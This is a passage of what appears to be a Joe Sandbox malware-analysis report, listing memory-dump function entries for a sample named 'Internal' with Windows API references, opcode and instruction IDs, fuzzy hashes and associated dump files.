                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: a389d5f143c839fc37eaeddc1f71e83505439f3d9088a793d72788668a503031
                                      • Instruction ID: a25a280d509a0fa342991475331295f2ba2536b1aee545b901a9a2ab480082e6
                                      • Opcode Fuzzy Hash: a389d5f143c839fc37eaeddc1f71e83505439f3d9088a793d72788668a503031
                                      • Instruction Fuzzy Hash: 6CD09E31144301BADA022B51CD0AF1E7AA2BB98B09F004554B284740F18A729D25EB11
                                      APIs
                                      • GetFileType.KERNELBASE(?,004F97BE), ref: 004F98C8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 384a2b4c2a51a076ef30ae197247dbf58f4e41f66203b45841ddce53227e6edd
                                      • Instruction ID: cbd4227e22ca7200090e841f90c26c6343974bca81c77d2d10f084f502424684
                                      • Opcode Fuzzy Hash: 384a2b4c2a51a076ef30ae197247dbf58f4e41f66203b45841ddce53227e6edd
                                      • Instruction Fuzzy Hash: 63C0123441010985CE34A62498481A67311AF533E57B48696C128852A1C32BCC8BEA14
                                      APIs
                                      • SetEndOfFile.KERNELBASE(?,004F903E,?,?,-00000870,?,?,?,?,00000000,?,-00000974,?,?,?,?), ref: 004F9F0C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: File
                                      • String ID:
                                      • API String ID: 749574446-0
                                      • Opcode ID: 92b7feda9912ae2e9b0bb0f98bb2844365574466ae348f78e833ab1a293d336f
                                      • Instruction ID: 09a0879771245ffa0b83d7bedc369e998c3a15c47325866cc1305f79b2747bbc
                                      • Opcode Fuzzy Hash: 92b7feda9912ae2e9b0bb0f98bb2844365574466ae348f78e833ab1a293d336f
                                      • Instruction Fuzzy Hash: F6A0123004000986CE101730C90850C3710FB217C070001945006CA061C716440B9610
                                      APIs
                                      • SetCurrentDirectoryW.KERNELBASE(?), ref: 0050AC08
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: CurrentDirectory
                                      • String ID:
                                      • API String ID: 1611563598-0
                                      • Opcode ID: c18146f3d28a91b56d08ae53210702ba2a0da0c9be05b1624a564c6901d604d6
                                      • Instruction ID: 402abfea90775880551de52270409819b0bb2af8f3460e2307654a6e0cd29412
                                      • Opcode Fuzzy Hash: c18146f3d28a91b56d08ae53210702ba2a0da0c9be05b1624a564c6901d604d6
                                      • Instruction Fuzzy Hash: 7EA011302002008B83000B328F0AA0EBAAAAFA2B00F00C028A00080030CB38C8B0FA00
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 006D45C3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction ID: 0f307bda21708c8d235b693c5381613291d716f93c8806c856ec33463e1f0eac
                                      • Opcode Fuzzy Hash: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction Fuzzy Hash: 37E0ECB5B00108ABDB10CE8CE944F9A33DEA748310F148012F609D7340C634EC109B65
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 006D45C3
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 00567000, based on PE: true
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction ID: 0f307bda21708c8d235b693c5381613291d716f93c8806c856ec33463e1f0eac
                                      • Opcode Fuzzy Hash: 6a69d03eff1d73ed3ecc0d7b0d73a89e904afd1bf10cad8c22920386fa559922
                                      • Instruction Fuzzy Hash: 37E0ECB5B00108ABDB10CE8CE944F9A33DEA748310F148012F609D7340C634EC109B65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: 5b4e3912c4ed5e98da58e73429ccc2bc2486fb24e1661b8cf84d0985e553daf0
                                      • Instruction ID: d4a042112f0702ecf712680dc2adf232249fce39c1ad98536dc947d721362604
                                      • Opcode Fuzzy Hash: 5b4e3912c4ed5e98da58e73429ccc2bc2486fb24e1661b8cf84d0985e553daf0
                                      • Instruction Fuzzy Hash: 51C24A71E086298FEB25CE289D457EABBB5FB84304F1445EAD84DE7240E775AEC18F40
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog_swprintf
                                      • String ID: CMT$h%u$hc%u
                                      • API String ID: 146138363-3282847064
                                      • Opcode ID: b0091af46338ca892c84d047b17763e0847ae2e9e8847e4ed6368267678e47e4
                                      • Instruction ID: 26bee5fd637b9e9a43e50a8eaaf833190ae9703e4157e13ee96277b2ab478d67
                                      • Opcode Fuzzy Hash: b0091af46338ca892c84d047b17763e0847ae2e9e8847e4ed6368267678e47e4
                                      • Instruction Fuzzy Hash: D732E57151028C9FDF14DF74C995AFA3B95AF15304F04047EFE8A8B282DB78AA49CB24
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004F2874
                                      • _strlen.LIBCMT ref: 004F2E3F
                                        • Part of subcall function 005002BA: __EH_prolog.LIBCMT ref: 005002BF
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004F2F91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog$Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                      • String ID: CMT
                                      • API String ID: 1057911484-2756464174
                                      • Opcode ID: 718859a28de3ee3434bf1f57b8274f57f839432ce4bc206810c250153c319640
                                      • Instruction ID: 256327d32f2d887a712ac87b8bdb03b649e5d52ec81bd7ef27d7e142a46c4a25
                                      • Opcode Fuzzy Hash: 718859a28de3ee3434bf1f57b8274f57f839432ce4bc206810c250153c319640
                                      • Instruction Fuzzy Hash: 156207715002498FDB19DF34C9856FA3BA1BF54300F08457FEE9A8B382DBB9A945CB24
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                      • Instruction ID: 66826c4ebad28b084e1d72f0f341a5ddfb29d4658d7df15affa81ec97648b52f
                                      • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                      • Instruction Fuzzy Hash: 7B020B71E002199BEF14CFA9D9806EDBBF1FF88314F258269D919E7285D731AA41CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: gj
                                      • API String ID: 0-4203073231
                                      • Opcode ID: a7d3dfe9c0aaf8ebd7b86d99e63ab3fbd1586b6b1e00405cc60075bebcb6410c
                                      • Instruction ID: 3439cc11b28fa149c8e148a9ceeb932814c10e13761175531c827bd0068f4f46
                                      • Opcode Fuzzy Hash: a7d3dfe9c0aaf8ebd7b86d99e63ab3fbd1586b6b1e00405cc60075bebcb6410c
                                      • Instruction Fuzzy Hash: C2C13776A183418FC354CF2AD88065BFBE1BFC9208F19892EE998D7311D734E945CB96
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: b=q=
                                      • API String ID: 0-4069823217
                                      • Opcode ID: 7819ad346afa70bb76fe9e4c52834997cc24c25f7a5ecf7e53e716b67314970e
                                      • Instruction ID: e93fab5ce57ee4e02c7ce18e8397d05ffe3f8e8d3535a46ed18349593ec453b6
                                      • Opcode Fuzzy Hash: 7819ad346afa70bb76fe9e4c52834997cc24c25f7a5ecf7e53e716b67314970e
                                      • Instruction Fuzzy Hash: 7E312631549396AFCB328E3884A12D7BFE6AF562013E65AAFC4C48B406D72154C7DB86
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction ID: 8af08906bcdfb94bc8b6e7f0a22b74750b62d4f76980fcaa9ef5119cc5620bb8
                                      • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                      • Instruction Fuzzy Hash: 6C62B1716047859FCB25CF28C8906BDBFE1BF95304F08896DE8AA8B386D734E955CB11
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction ID: 4418a86de34ee5292af17bd3eb2e57ba1e050a3a26428328a7683a2992e0efed
                                      • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                      • Instruction Fuzzy Hash: E562D871A087498FCB15CF28C4909BDBFE1BF99304F18896DE89A8B386D730E945CB55
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7a1e5ada8c23a19605686052367fa2865b8a07688fe5a1d127909fe771fb5587
                                      • Instruction ID: a3695c6d9982a35a69f7bd3e43b5b78274cd615a6104a64a0f0564b92aa1703d
                                      • Opcode Fuzzy Hash: 7a1e5ada8c23a19605686052367fa2865b8a07688fe5a1d127909fe771fb5587
                                      • Instruction Fuzzy Hash: 00524972A087018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA59CB86
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1289c2301875235396db0356645a1a6aea8092f05ca485c5207dc28a13b94fa4
                                      • Instruction ID: 20ec512e4f7ee99d10d821188c1d8ae8c9bf6fa486e54b5aad6d10e3728f98f0
                                      • Opcode Fuzzy Hash: 1289c2301875235396db0356645a1a6aea8092f05ca485c5207dc28a13b94fa4
                                      • Instruction Fuzzy Hash: AC12B3B1A1870A9FC718CF28C8906BDBBE1FB98304F14492EE997C7681D374B595CB45
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 197c522e54025ddc1bcb9563e9fc4070131ccf9b078cba647640f71f8a9f4a10
                                      • Instruction ID: 7dd7ac8a2d49410e7e569829858995cff66910a6182fffecfcc4c9c6ea9c14cd
                                      • Opcode Fuzzy Hash: 197c522e54025ddc1bcb9563e9fc4070131ccf9b078cba647640f71f8a9f4a10
                                      • Instruction Fuzzy Hash: 35F1AB71A083098FD718CF28C6C4A3ABBE1EFCA314F144A2EE685C7351D638D945CB4A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 95d7495eba7b288cbfeb7c1f8cf1a01db71fe66f947809f5d881a6825d948f5c
                                      • Instruction ID: d30b35e7b571a745a23851c53e97eab11b6459960e47827b0671df8d83040018
                                      • Opcode Fuzzy Hash: 95d7495eba7b288cbfeb7c1f8cf1a01db71fe66f947809f5d881a6825d948f5c
                                      • Instruction Fuzzy Hash: F8D1D4B1A083458FDB14CF28C84475FBFE5BF89308F08496DE8899B282D774EA55CB56
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 478f2c8dd5c9289f4ad0cb8710e638d6e1a24da7f57e0ef2423c373be98215d3
                                      • Instruction ID: a563c967631d7b322f40d4dd4344e1b37270e08a3747666698b38d83c3ae36c4
                                      • Opcode Fuzzy Hash: 478f2c8dd5c9289f4ad0cb8710e638d6e1a24da7f57e0ef2423c373be98215d3
                                      • Instruction Fuzzy Hash: 62E12A755083949FC304CF69D89086BBFF0AFAA300F45495EF9D497352C235EA19DBA2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66d5e2ebb20806e963a3a6dd19f0006205bd1a478d0bc341cc39bfcc49e71d2b
                                      • Instruction ID: 037b6f2f874d6901d37c09156e86ebed79ade6b9492178f3e3b90ed0a11b9b93
                                      • Opcode Fuzzy Hash: 66d5e2ebb20806e963a3a6dd19f0006205bd1a478d0bc341cc39bfcc49e71d2b
                                      • Instruction Fuzzy Hash: 099158F020034A9BDB24EE64D895BFE7BD5FB90304F100D2DF79A872C2EA649595CB52
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9ed735d3009c788032387d83a07ae73a03470e2e79bb9b48b570b6362c341a9e
                                      • Instruction ID: 79e966065b4f54f9440018d65506a01024382f1f95b56e847339d2492340ce47
                                      • Opcode Fuzzy Hash: 9ed735d3009c788032387d83a07ae73a03470e2e79bb9b48b570b6362c341a9e
                                      • Instruction Fuzzy Hash: 86B14935210A189FD719CF28D48AB667FA0FF56364F258658E89ACF2E1C335ED81CB44
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction ID: 2f3db365d7366001111a8c954e9ddab0d3ea2695321d1970a21b03b99942d4f1
                                      • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                      • Instruction Fuzzy Hash: 45813DF13043465BDF24DE68C891BBD3BD4BB94304F040D2EEB8A8B1C2DA7499858B56
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 87bfdd2b19d4edf9e3717b34eadecfc7ed688a32f04f1679aeaff8b11782c119
                                      • Instruction ID: e5254b1cbc9837459bcef13bd7c8cb8610b8bb5c3c66769f2b27ca21e57c1681
                                      • Opcode Fuzzy Hash: 87bfdd2b19d4edf9e3717b34eadecfc7ed688a32f04f1679aeaff8b11782c119
                                      • Instruction Fuzzy Hash: 5761583A600F09D6FE345968A899BFE2F94FBC1340F540D1AE563DF281F2B19DC28611
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction ID: 3bb00bf28e72fc3f282b5abe32c161bbeb22813bc97a9b0c2756b051bda9abbc
                                      • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                      • Instruction Fuzzy Hash: 47513425604E45E7FB3545A8845EBFE2F85BBC6300F185819E882DB382F635EEC6C791
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c55a7c7986061739219e6f3b7bc56285a1c51c80d7623f474e1b377a2bd3fc1b
                                      • Instruction ID: d1d994e40e6fbdb415cb118751b7b3f95da269387b7a34dbb53d6970f08d014e
                                      • Opcode Fuzzy Hash: c55a7c7986061739219e6f3b7bc56285a1c51c80d7623f474e1b377a2bd3fc1b
                                      • Instruction Fuzzy Hash: 4E817D76D012698FCB65CF24CD88A9DB7B5FF44750F1446DAE80AA3254EB31AE85CF80
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7af6df6ca596eed6cc2f1ded1c31c4de65b79143041e403bbeba28056b12fb69
                                      • Instruction ID: d1803bb12d6cb4fe100153cd8bc5a7936110149f07bfd15aa53defc297335a68
                                      • Opcode Fuzzy Hash: 7af6df6ca596eed6cc2f1ded1c31c4de65b79143041e403bbeba28056b12fb69
                                      • Instruction Fuzzy Hash: 11412E6244E7C18FE7138B708CA46957FB19E5325039E88CBC0E1CF8B3E558995AD362
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1430811610.0000000004AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4ae0000_Internal.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f788f98c43a8250edef7e73017923e591ff3aca5f19730ad30255c6577ba97d1
                                      • Instruction ID: e7d7ea4c88ed4b934410c4f9743fbb88190b80f6b0af986744821935f98ded40
                                      • Opcode Fuzzy Hash: f788f98c43a8250edef7e73017923e591ff3aca5f19730ad30255c6577ba97d1
                                      • Instruction Fuzzy Hash: B2611D76D062658BCF619F28CD88A9EB7B5FF48750F1042D9D81EA3250EB319E85CF50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
